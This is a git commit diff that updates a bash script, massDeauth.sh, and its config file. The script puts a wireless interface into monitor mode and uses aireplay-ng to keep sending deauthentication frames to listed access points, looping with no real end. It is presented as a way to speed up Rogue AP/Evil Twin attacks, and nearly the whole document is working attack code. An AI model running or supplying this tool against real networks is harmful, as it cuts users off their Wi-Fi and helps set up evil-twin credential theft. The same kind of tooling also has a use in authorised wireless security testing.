Updated massDeauth.sh script.

This commit is contained in:
Mariusz B 2018-02-13 16:06:37 +01:00
parent a0d3bf45dc
commit 3751a3eadf
2 changed files with 41 additions and 33 deletions

View File

@ -9,6 +9,6 @@ retry = 3
# Here comes a list of APs to attack. The list entry form is following:
# target = <essid> <bssid> <channel>
target = test 00:11:22:33:44:55 14
target = test2 00:11:22:33:44:55 14
target = test3 00:11:22:33:44:55 14
target = SomeAP 00:11:22:33:44:55 1
target = OtherAP 00:11:22:33:44:55 2
target = AnotherAP 00:11:22:33:44:55 3

View File

@ -1,32 +1,9 @@
#!/bin/bash
#
# Simple script intended to perform mass-deauthentication of
# any associated&authenticated client to the Access-Point.
# Helpful to actively speed up Rogue AP/Evil Twin attacks in
# multiple Access-Points within an ESSID environments.
#
# In other words, if you have an ESSID set up from many
# access-points (BSSIDs) - this script will help you
# deauthenitcate all clients from those APs iteratively.
#
# Expected config file must obey the following format:
# -----------------------------------------------
# # Specify an interface
# iface = wlp4s0
#
# # Number of deauths
# deauths = 3
#
# # Retry deauths, 0 - infinity
# retry = 3
#
# # Here comes a list of APs to attack. The list entry form is following:
# # target = <essid> <bssid> <channel>
# target = test 00:11:22:33:44:55 14
# target = test2 00:11:22:33:44:55 14
# target = test3 00:11:22:33:44:55 14
# -----------------------------------------------
# This is a massive WLAN deauthentication attacking script
# that takes as input list of APs against which should deauth be launched,
# and then attempts that attack.
#
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
#
@ -36,6 +13,11 @@ if [ $# -ne 1 ]; then
exit 1
fi
if [ $EUID -ne 0 ]; then
echo "[!] This script must be launched as root."
exit 1
fi
function deauthClients {
echo -e "\tDeauthing clients in AP: $essid / $bssid, $ch"
iface=$1
@ -44,33 +26,59 @@ function deauthClients {
ch=$4
deauths=$5
airmon-ng stop $iface @> /dev/null
airmon-ng stop ${iface}mon @> /dev/null
sleep 2
echo -e "\t[1] Starting monitor on channel $ch"
airmon-ng start $iface $ch @> /dev/null
sleep 3
if [ -z "$(ls /sys/class/net | paste | grep ${iface}mon)" ]; then
echo "[!] Could not start monitor interface! Will try again..."
sleep 3
return
fi
echo -e "\t[2] Deauthing $deauths number of times..."
aireplay-ng --deauth $deauths -a $essid $iface
aireplay-ng --deauth $deauths -e $essid -a $bssid ${iface}mon
}
config=$(cat $1 | grep -vE '^#')
retry=$(echo "$config" | grep retry | cut -d= -f2 | cut -d' ' -f2-)
deauths=$(echo "$config" | grep deauths | cut -d= -f2 | cut -d' ' -f2-)
deauths=$(echo "$config" | grep 'deauths' | grep '=' | awk '{print $3}')
iface=$(echo "$config" | grep iface | cut -d= -f2 | cut -d' ' -f2-)
echo "Using interface: $iface"
echo "Retry count: $retry"
echo "Deauths to be sent: $deauths"
if [ -n "$(ps -eF | grep -v grep | grep airodump)" ]; then
echo "[!] Airodump-ng is running: will not stick to one channel."
echo "[!] Please kill airodump-ng first, then proceed further."
exit 1
fi
IFS=$'\n'
if [ $retry -eq 0 ]; then
retry=99999999
fi
IFS=$'\n'
for i in $(seq 0 $retry); do
echo -e "\n[$i] Deauthing clients..."
for line in $(echo "$config" | grep 'target' | cut -d= -f2 | cut -d' ' -f2-); do
essid=$(echo "$line" | awk '{print $1}')
bssid=$(echo "$line" | awk '{print $2}')
ch=$(echo "$line" | awk '{print $3}')
if [ -z $ch ]; then
echo "[!] You must specify <channel> for ESSID: $essid"
exit 1
fi
if [ -z $bssid ]; then
echo "[!] You must specify <bssid> for ESSID: $essid"
exit 1
fi
deauthClients $iface $essid $bssid $ch $deauths
done